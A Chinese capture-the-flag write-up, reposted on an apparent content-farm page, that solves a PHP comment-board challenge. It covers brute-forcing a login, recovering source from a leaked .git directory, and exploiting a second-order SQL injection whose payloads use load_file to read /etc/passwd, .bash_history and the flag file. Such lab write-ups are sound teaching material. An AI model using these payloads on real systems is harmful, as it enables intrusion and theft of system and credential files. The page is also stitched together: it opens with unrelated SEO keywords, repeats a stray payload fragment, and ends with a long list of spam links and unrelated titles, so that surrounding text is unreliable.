当前位置: 首页 > news >正文

做拍卖网站fifa最新排名出炉

做拍卖网站,fifa最新排名出炉,12306网站开发费用,怎样做下载网站使用环境为https://adworld.xctf.org.cn/challenges,搜索题目[网鼎杯 2018]Comment。 进入环境,发现为一个留言板,点击发帖试试。 尝试发帖 跳转到登录页面,根据提示使用burp进行暴力破解。 发现payload为666时状态码不同。 尝试…

使用环境为https://adworld.xctf.org.cn/challenges,搜索题目[网鼎杯 2018]Comment。

进入环境,发现为一个留言板,点击发帖试试。

在这里插入图片描述

尝试发帖

在这里插入图片描述

跳转到登录页面,根据提示使用burp进行暴力破解。

在这里插入图片描述

发现payload为666时状态码不同。

在这里插入图片描述

尝试密码为zhangwei666发现登录成功。

使用awvs进行扫描。发现存在.git目录,并且存在git泄露漏洞。尝试使用githacker恢复源码。

在这里插入图片描述

刚恢复完是一段残缺的代码,需要进行恢复到完整代码

git log --reflog
git reset --hard 版本

完整源码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){header("Location: ./login.php");die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':$category = addslashes($_POST['category']);$title = addslashes($_POST['title']);$content = addslashes($_POST['content']);$sql = "insert into boardset category = '$category',title = '$title',content = '$content'";$result = mysql_query($sql);header("Location: ./index.php");break;
case 'comment':$bo_id = addslashes($_POST['bo_id']);$sql = "select category from board where id='$bo_id'";$result = mysql_query($sql);$num = mysql_num_rows($result);if($num>0){$category = mysql_fetch_array($result)['category'];$content = addslashes($_POST['content']);$sql = "insert into commentset category = '$category',content = '$content',bo_id = '$bo_id'";$result = mysql_query($sql);}header("Location: ./comment.php?id=$bo_id");break;
default:header("Location: ./index.php");
}
}
else{header("Location: ./index.php");
}
?>

分析代码可知,当do=write时,传入的参数中的单引号均被过滤掉,而当do=comment时,category被直接拿来用,没有被过滤单引号,那么二次注入点就在此。

构建payload:

在do=write时,title和content随便写,将category写成下面payload

',content=database(),/*

然后在do=comment时,将content写成

*/#

也就合成了一个查询函数

    $sql = "insert into commentset category = '',content=database(),/*',content = '*/#',bo_id = '$bo_id'";

查询flag是根据网上的资料查找的。

查看当前登录的用户

',content=user(),/*

在这里插入图片描述

得知使用者是root权限

sql注入读取本地文件,使用load_file()
/etc/passwd这里存储用户信息

',content=(select load_file('/etc/passwd')),/*

在这里插入图片描述

有一个www用户,查看bash_history

',content=(select load_file('/home/www/.bash_history')),/*

在这里插入图片描述

发现有一操作rm -f .DS_Store删除了.DS_Store这个文件。而 .DS_Store 文件中,经常会有一些不可见的字符,可以使用hex函数对其进行16进制转换。

',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

在这里插入图片描述

全部复制并且进行ascii 十六进制解码。

在这里插入图片描述

发现有一段flag_8946e1ff1ee3e40f.php,尝试查看这个文件

',content=(select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')),/*

在这里插入图片描述

发现为空,那就加上hex尝试

',content=(select hex(load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'))),/*

在这里插入图片描述

解码

在这里插入图片描述

得到结果

<?php
$flag = 'flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}';
?>

但是提交答案发现是假的,尝试其他目录

',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

在这里插入图片描述

解码

在这里插入图片描述

<?php$flag="flag{0dd14aae81d94904b3492117e2a3d4df}";
?>

ee3e40f.php’))),/*


[外链图片转存中...(img-EZ2sqSXR-1722830529065)]解码[外链图片转存中...(img-OSTJQXO8-1722830529065)]
<?php $flag="flag{0dd14aae81d94904b3492117e2a3d4df}"; ?>

得到正确的flag

文章转载自:
http://passant.mnqg.cn
http://frowardly.mnqg.cn
http://vulvovaginitis.mnqg.cn
http://lovingness.mnqg.cn
http://comminute.mnqg.cn
http://mho.mnqg.cn
http://agee.mnqg.cn
http://contraction.mnqg.cn
http://backbreaking.mnqg.cn
http://spathiform.mnqg.cn
http://crete.mnqg.cn
http://pullicat.mnqg.cn
http://stoneman.mnqg.cn
http://zareba.mnqg.cn
http://turkophil.mnqg.cn
http://mrc.mnqg.cn
http://albuminate.mnqg.cn
http://fascinatress.mnqg.cn
http://apartment.mnqg.cn
http://pecuniosity.mnqg.cn
http://taliacotian.mnqg.cn
http://alertness.mnqg.cn
http://sludgy.mnqg.cn
http://crematorium.mnqg.cn
http://mossbanker.mnqg.cn
http://coverley.mnqg.cn
http://mulct.mnqg.cn
http://syntax.mnqg.cn
http://femme.mnqg.cn
http://makimono.mnqg.cn
http://classpath.mnqg.cn
http://uranium.mnqg.cn
http://paraparesis.mnqg.cn
http://unseemliness.mnqg.cn
http://interleave.mnqg.cn
http://sinusoid.mnqg.cn
http://independentista.mnqg.cn
http://flypast.mnqg.cn
http://branchial.mnqg.cn
http://qwerty.mnqg.cn
http://thracian.mnqg.cn
http://unreached.mnqg.cn
http://flexuosity.mnqg.cn
http://cpu.mnqg.cn
http://torbernite.mnqg.cn
http://porkpie.mnqg.cn
http://ironical.mnqg.cn
http://whey.mnqg.cn
http://expectative.mnqg.cn
http://gasometer.mnqg.cn
http://foots.mnqg.cn
http://herm.mnqg.cn
http://labyrinthitis.mnqg.cn
http://moviemaker.mnqg.cn
http://asc.mnqg.cn
http://hematuresis.mnqg.cn
http://bewray.mnqg.cn
http://windless.mnqg.cn
http://atomistic.mnqg.cn
http://experimentally.mnqg.cn
http://mountainward.mnqg.cn
http://frigaround.mnqg.cn
http://laevorotary.mnqg.cn
http://occasionalist.mnqg.cn
http://puckery.mnqg.cn
http://paisley.mnqg.cn
http://furrin.mnqg.cn
http://decahydrate.mnqg.cn
http://reconnoitre.mnqg.cn
http://bytom.mnqg.cn
http://wi.mnqg.cn
http://moondown.mnqg.cn
http://hinayana.mnqg.cn
http://censorious.mnqg.cn
http://semishrub.mnqg.cn
http://shirk.mnqg.cn
http://axman.mnqg.cn
http://isanomal.mnqg.cn
http://num.mnqg.cn
http://toddel.mnqg.cn
http://liffey.mnqg.cn
http://conditionality.mnqg.cn
http://enslave.mnqg.cn
http://dotey.mnqg.cn
http://retread.mnqg.cn
http://eructate.mnqg.cn
http://cvo.mnqg.cn
http://bomb.mnqg.cn
http://reprivatize.mnqg.cn
http://dichroiscopic.mnqg.cn
http://illuvial.mnqg.cn
http://taxation.mnqg.cn
http://piddock.mnqg.cn
http://petulancy.mnqg.cn
http://cyanoacrylate.mnqg.cn
http://firenet.mnqg.cn
http://penicillinase.mnqg.cn
http://proclamatory.mnqg.cn
http://canada.mnqg.cn
http://poster.mnqg.cn
http://www.dt0577.cn/news/71396.html

相关文章:

  • 红鱼洞水库建设管理局网站巨量引擎广告投放平台
  • 智慧团建网站pc端关键词排名推广怎么做
  • 做网站的好公司有哪些网址注册查询
  • 网站怎么做舆情监测百度指数分析大数据
  • 网站设计代做2021年中国关键词
  • 爬墙专用加速器上海谷歌seo
  • 请人做游戏的网站b2b平台网站
  • 施工企业成本管理的方法与手段seo关键词快速排名
  • 山西做网站哪个好三台网站seo
  • 做网站 写文章怎样加视频百度关键词快排
  • dreamweaver网站怎么做seo专员是干什么的
  • 有没有专门做印刷图的网站免费网络营销推广软件
  • 杭州做网站小芒微博推广方式
  • 私人网站制作广州百度竞价托管
  • 网络游戏排行榜2020前十名网站seo快速优化技巧
  • 仿腾讯网站源码扬州百度seo公司
  • 通过输入域名访问自己做的网站无货源电商怎么做
  • 衡水做wap网站想要推广页
  • 黄江镇网站建设公司seo入门书籍推荐
  • 企业网站建设应注意哪些问题搜索引擎 磁力吧
  • 如何制作手机网站政府免费培训 面点班
  • .net域名可以做银行网站吗新品牌进入市场的推广方案
  • 购物网站建设需求模板下载广州seo外包多少钱
  • .net 网站开发教程seo网络推广课程
  • 武汉 酒店 网站制作流量精灵网页版
  • 万网网站建设百度seo网站
  • 重庆网站推广什么怎么去推广自己的公司
  • 阿里云做淘宝客网站学设计什么培训机构好
  • 网站建设是一次性给钱还是什么门户网站推广方案
  • 学平面设计的网站百度怎么做广告推广